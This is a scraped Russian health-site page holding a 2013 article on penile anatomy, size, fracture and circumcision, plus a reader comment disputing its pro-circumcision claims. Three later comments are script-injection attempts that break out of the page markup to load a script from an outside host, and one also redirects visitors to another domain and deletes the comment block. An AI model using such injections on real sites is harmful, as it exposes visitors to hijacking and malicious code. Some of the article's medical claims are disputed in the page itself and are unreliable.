Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Что нужно знать о половом...  >>  Что нужно знать о половом члене
 
Обратная связь
 

Что нужно знать о половом члене

Размер шрифта
05 ноября 2013 00:00
  • google_analytics: false
  • Нравится

В нашем ханжеском обществе обсуждать пенис не принято, поэтому даже на приеме у врача многие мужчины будто проглатывают язык и не могут спокойно изложить свои проблемы. Как раз для таких стеснительных мужчин (ну, и женщин, чего уж там) в этой статье собраны ответы на самые волнующие вопросы о главной мужской гордости.

Что нужно знать о половом члене

Кто управляет половым членом

Нередко мужчина испытывает эрекцию в самом неподходящем месте без всяких видимых поводов и вопреки своему желанию. И, напротив, бывает так, что эрекция жизненно необходима, но пенис остается издевательски мягким. Действительно, как будто этот маленький орган живет своей жизнью!

Причина заключается в том, что половой член контролируется с помощью так называемой вегетативной нервной системы, которая неподконтрольна нашему сознанию. Хорошим примером являются утренние эрекции, которые возникают абсолютно без всякого желания мужчины.

Конечно, в некоторой степени человек может контролировать эрекцию, но, в общем и целом, это неуправляемый рефлекторный акт.

Имеет ли размер значение

Самые исчерпывающие сведения о размерах полового члена были собраны в статье, над которой работал коллектив отделения урологии Медицинского колледжа Уэйлла Корнелла (Нью-Йорк, США):

  • Среднестатистическая длина пениса в спокойном состоянии лежит в промежутке 8,6-9,3 сантиметров
  • Среднестатистическая длина пениса в состоянии эрекции составляет 12,9-14,5 сантиметров
  • Среднестатистическая длина окружности эрегированного члена составляет 8,8-10 сантиметров

Также в некоторых исследованиях показано, что у некоторых мужчин пенис в спокойном состоянии имеет ту же длину, что и в состоянии эрекции, тогда как у других длина может различаться более чем в два раза.

Некоторые факторы могут привести к укорочению полового члена. К их числу относятся избыточная масса тела, эндокринные заболевания, некоторые операции и так далее.

Должен ли он быть прямым

Ученые изучили огромное множество МР-томограмм мужчин во время сексуального возбуждения и пришли к выводу, что чаще эрегированный член имеет форму бумеранга. Основание пениса фиксировано к лобковой кости с помощью особой связки, что формирование острого угла с линией живота и минимальную подвижность в области основания. Эту связку можно подрезать, и тогда длина члена немного увеличится, однако утратится угол и стабильность.

Можно ли сломать половой член

Пенис – это не кость, однако его вполне можно сломать. Это случается довольно редко, и обычно у молодых мужчин, которые слишком усердно пользуются своим агрегатом. В результате внешняя белочная оболочка пещеристых тел рвется, форма пениса деформируется, а кровь выливается в окружающие ткани, из-за чего половой член становится темно-синим и отечным. Такие травмы крайне болезненны и, кроме того, чреваты развитием опаснейших осложнений, поэтому их расценивают как экстренные состояния.

Зачем нужно обрезание

Обрезание, или циркумизация, – это операция, в ходе которой происходит удаление крайней плоти полового члена. В развитых странах эта процедура крайне распространена: например, в США порядка 70% мужчин обрезаны.

Впервые циркумизация возникла на ближнем востоке, в еврейской и мусульманской культурах. Причина проста: при высокой температуре микробы очень быстро скапливаются под крайней плотью, становясь причиной развития инфекций мочеполовых путей. Поэтому евреи и мусульмане начали обрезать всех младенцев без исключения, чтобы обезопасить их здоровье.

Сегодня эта ближневосточная мудрость подтверждена в научных исследованиях. Доказано, что среди молодых пациентов с уретритом 95% являются необрезанными. Кроме того, циркумизация в разы снижает риск рака головки полового члена.

У вас остались еще вопросы? Посетите наш специальный проект «Секс с мужчиной», где ваше любопытство будет удовлетворено сполна.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

05 ноября 2013 в 00:49

Цитировать   |   Пожаловаться

Елена! Я в шоке от вашей активной позиции за обрезание. Могли бы вы пояснить чем помимо религии ее обосновываете?
Ваши рекомендации делать детям обрезание идут категорически в разрез с официальными мнениями всех ведущих медицинских организаций мира, включая рекомендации ВОЗ.
В США уже с 80-х годов никто не обрезает поголовно, и американская Академия Педиатров с 1999 года не рекомендует рутинное обрезание. Более того не так давно Совет Европы признал мужское рутинное (ритуальное) обрезание генитальным увечьем наравне с женским и насилием над правами человека о неприкосновенности тела.
Крайняя плоть была создана эволюцией, она имеет ряд важнейших функций, включая защиту головки, ее смазку и поддержание правильной микрофлоры и оптимальной гигиены. Головка сама не имеет увлажняющих желез, и без крайней плоти она высыхает, грубеет, у мужчины теряется 2\3 всей чувствительности полового члена. Половой член способен самоочищаться. Почему в вашем шоу вы это так активно умалчиваете?
Знали ли вы, что в крайней плоти содержится 75% всех чувствительных нервных окончаний, остальное в уздечке, которая зачастую полностью удаляется у детей, и лишь малая толика приходится на головку, и поэтому среди обрезанных мужчин в десятки раз выше проблемы с потенцией?
Знали ли вы, что США с их поголовным обрезанием в прошлом на первом месте по ВИЧ-инфекциям, и ЗППП среди развитых стран? А ученые Кении проведи независимое исследование, финансирующееся деньгами правительства, а не корпорациями США, и выяснили, что с момента пропаганды обрезания  уровень заражения ВИЧ-инфекцией возрос?
Крайняя плоть это не придаток, который вы так рьяно советуете всем ампутировать, эта часть тела не является угрозой возникновения рака, ассоциация рака не рекомендует делать О. Чтобы предотвратить 1 случай рака нужно обрезать сто тысяч. В США ежегодно умирает от осложнений О порядка 117 детей в год. Где ваша этика?

2 - zzzzzz

30 июня 2015 в 18:56

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 18:56

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

4 - zzzzzz

30 июня 2015 в 22:55

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
В лабораториях научились выращивать настоящие половые члены?   Гормон секса не даст вам наесться!   Как научить мужа доставлять вам удовольствие в постели   Playboy отказался от голых девушек! Как порно влияет на мозг  
09 июля 2013Майкл Дуглас заболел раком гортани из-за орального секса! Как дальше жить? 01 ноября 2013ИНВИТРО – «Марка №1» в России
 
21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт» 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 

Слайдшоу

1
Проблемы, с которыми справится секс. Часть 4
Лучшие позы для любых ситуаций
Чем полезен секс?

Тесты

1
Здорова ли ваша предстательная железа
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.